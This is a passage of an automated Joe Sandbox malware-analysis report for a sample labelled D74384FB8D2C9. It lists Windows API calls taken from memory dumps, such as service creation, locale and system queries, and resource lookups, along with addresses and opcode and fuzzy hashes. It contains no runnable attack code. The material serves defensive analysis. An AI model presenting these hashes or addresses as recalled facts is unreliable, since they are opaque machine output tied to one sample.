                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f57626ccbf8a88f8973daa56ffcf315ae7f9b96cbf56d05f644017582010076
                                                                                  • Instruction ID: d177f85916ef8935eff6deb603a50b64f49dd0184b657b139fdb2fdbab700f02
                                                                                  • Opcode Fuzzy Hash: 8f57626ccbf8a88f8973daa56ffcf315ae7f9b96cbf56d05f644017582010076
                                                                                  • Instruction Fuzzy Hash: 9FF01931504249BBDF015FA5CC89EAE3BAEAB12345B05C828FC26E5450DF30CE56DB51
                                                                                  APIs
                                                                                  • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2659
                                                                                  • GetLastError.KERNEL32(?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2663
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2673
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$CloseCreateErrorHandleLast
                                                                                  • String ID:
                                                                                  • API String ID: 2127812319-0
                                                                                  • Opcode ID: 5c7378031ce719524090c7e8b2e47412bf7177a908a88d9d7327c2ec12efb388
                                                                                  • Instruction ID: 198e70bbf45f4f1f077df1d26d448a6fb4c956998ae61ebe6e7e95d02f6a2ec4
                                                                                  • Opcode Fuzzy Hash: 5c7378031ce719524090c7e8b2e47412bf7177a908a88d9d7327c2ec12efb388
                                                                                  • Instruction Fuzzy Hash: D3D09EB82A03017AFE1016628D5BF6A25AEAB51B82F845464B601E94C0D6E94C409D34
                                                                                  APIs
                                                                                  Strings
                                                                                  • %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 6A6DF4F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
                                                                                  • API String ID: 2111968516-3431257331
                                                                                  • Opcode ID: 63d40c8554bafffec513a92fe5bfdf807a8ef848c93d1c0a5bf370685db57c8a
                                                                                  • Instruction ID: 7161f412cad1f407f8c2104b2ccc505f0a11db2022c97f0ca198e5e623aeb083
                                                                                  • Opcode Fuzzy Hash: 63d40c8554bafffec513a92fe5bfdf807a8ef848c93d1c0a5bf370685db57c8a
                                                                                  • Instruction Fuzzy Hash: 9531B8B16183115BC308DF2E9C9492F76D6ABC8305F408A2DF889D7395EA34DE14C7E6
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,0BEB5938), ref: 0BEB58BC
                                                                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0BEB5938), ref: 0BEB58E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: ae727caa2986b5642f00d958e6ba0a09f32bb935d482bb72b079dc3f98646b72
                                                                                  • Instruction ID: cdb2b6b49d62062cac2f9344791672c16f59e064f7159398b0f2482fa189da12
                                                                                  • Opcode Fuzzy Hash: ae727caa2986b5642f00d958e6ba0a09f32bb935d482bb72b079dc3f98646b72
                                                                                  • Instruction Fuzzy Hash: 0701D0703142596FDB21EB64DCA3FDA73ECDB64710F5050B19A54D62C0DAF06E448925
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE9FBC8), ref: 0BE9FB8A
                                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0BE9FBC8), ref: 0BE9FBA3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: e6e24d1605d574e3d29e6418ce35ffec6f6c095a69f7cacc03eec310f608f15f
                                                                                  • Instruction ID: 0623a8a93dcb5efaa6d5148b91c862d95b7683c0745ce833ae8a1e6d6cf5f041
                                                                                  • Opcode Fuzzy Hash: e6e24d1605d574e3d29e6418ce35ffec6f6c095a69f7cacc03eec310f608f15f
                                                                                  • Instruction Fuzzy Hash: 33F09631E14304BFEF10EFE1E852D9EB37EDB85710F40D565A510D7680EA7469088660
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 7efe12d2f841d686b92edbd5c92c72371cabb6cfabb00f875f9a440434965a92
                                                                                  • Instruction ID: fdf5b737d45751501547b1d7014a905f6ac86e90f12f81d0687a38e3a9c4f95e
                                                                                  • Opcode Fuzzy Hash: 7efe12d2f841d686b92edbd5c92c72371cabb6cfabb00f875f9a440434965a92
                                                                                  • Instruction Fuzzy Hash: 8892A375605A028FD72CCF0AD590966F7E2FF88314328C96DD0AB87B59DA34B456CF84
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  • Opcode ID: 613cedce7ab40510beee1a3c61925853b6e459a98a93c03b344ffb24d8ed5db2
                                                                                  • Instruction ID: 197b8a6cba358e30b91ab96ff8265393cd022755d5b2ccd7d1d2f60d19adef51
                                                                                  • Opcode Fuzzy Hash: 613cedce7ab40510beee1a3c61925853b6e459a98a93c03b344ffb24d8ed5db2
                                                                                  • Instruction Fuzzy Hash: 48F18D71605209FFDB24CF68C894EEE7BAAEF05318F018919F8559B292DF35D902CB64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: a3a3a2ed2c204b921976b6432812c7ff27d72dac3b8db0a23bc4fb179a171c16
                                                                                  • Instruction ID: c40558f35bf729f3d29089e7da38c728cb739b4fe0b45a9117d128a7d8e9bbb4
                                                                                  • Opcode Fuzzy Hash: a3a3a2ed2c204b921976b6432812c7ff27d72dac3b8db0a23bc4fb179a171c16
                                                                                  • Instruction Fuzzy Hash: D2E1687160E3468FC354DF68C08066EB7E1FF89304F14892DE59987392EB75E989CB82
                                                                                  APIs
                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0BE9BBDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1705453755-0
                                                                                  • Opcode ID: ecbae96b16a937ee9cecdf9535712b553bd15bbfef93f1f0ab8a3b26c268133e
                                                                                  • Instruction ID: c12eee1264cdec1247075eb3098e84d033af7f81509ca9fb51214c8dc8346be3
                                                                                  • Opcode Fuzzy Hash: ecbae96b16a937ee9cecdf9535712b553bd15bbfef93f1f0ab8a3b26c268133e
                                                                                  • Instruction Fuzzy Hash: 2811AFB1E00109EF9B44CFA9D9819EFF7F9FF8C300B148566A519E7250E6319A058BA0
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0BEAACB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindResource
                                                                                  • String ID:
                                                                                  • API String ID: 1635176832-0
                                                                                  • Opcode ID: 03dbba5f51b30bbfe3fee0cb0d38b4ad34bb6af81c4c22b0552003047b7a0ff6
                                                                                  • Instruction ID: 913aa9e30047c9fc6078e75aff269738d2c3152c8bb5f8f26ccba8719f366553
                                                                                  • Opcode Fuzzy Hash: 03dbba5f51b30bbfe3fee0cb0d38b4ad34bb6af81c4c22b0552003047b7a0ff6
                                                                                  • Instruction Fuzzy Hash: B0012671304300AFE701DF6AEC92D2AB7EEEB8A718712A479F500CB340EA31EC01C660
APIs
• GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE96DB2), ref: 0BE96D72
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d6404e28d5fded3a1c44c1f06d7e5ea6aba51a7cc097698c62ca3ebc278c821b
• Instruction ID: b06b66f6de06850a4f9685d44ba74c9f58ebe36b15a93ad8721cc3e6e1a57452
• Opcode Fuzzy Hash: d6404e28d5fded3a1c44c1f06d7e5ea6aba51a7cc097698c62ca3ebc278c821b
• Instruction Fuzzy Hash: 2FF0C234A04309AFEF14EFE1DC52AEEB3BAFB84710F409935912097680E7B42A088694
APIs
• GetSystemInfo.KERNEL32(?), ref: 0BEB5E48
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: 57a96c3a3f1b1ee8e1f46a4ce6f1beca87aedfa152dd1818a73d7725729c880d
• Instruction ID: edd4f34a463c573fca11eff0f921923f896f9110a149c82900ccfb51c321538b
• Opcode Fuzzy Hash: 57a96c3a3f1b1ee8e1f46a4ce6f1beca87aedfa152dd1818a73d7725729c880d
• Instruction Fuzzy Hash: 5FF06271E012099FCB15DF98C494CDEB7B4FB66241B44529AD404D7251EB30E954CB80
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: cc7f4696d2fbe55a68bea8542f61fabab6a047a6708a8a252cdfd032cba9a492
• Instruction ID: d9d96a41f00cd85e2ff01f976d5df007bb40164b861c305a563ccc3edbc85683
• Opcode Fuzzy Hash: cc7f4696d2fbe55a68bea8542f61fabab6a047a6708a8a252cdfd032cba9a492
• Instruction Fuzzy Hash: ABE0D8717002181BDB14E659BC819F6736C9B58710F00516AFE04C7384FDA0DD4C47E5
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0BE9E5A7
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
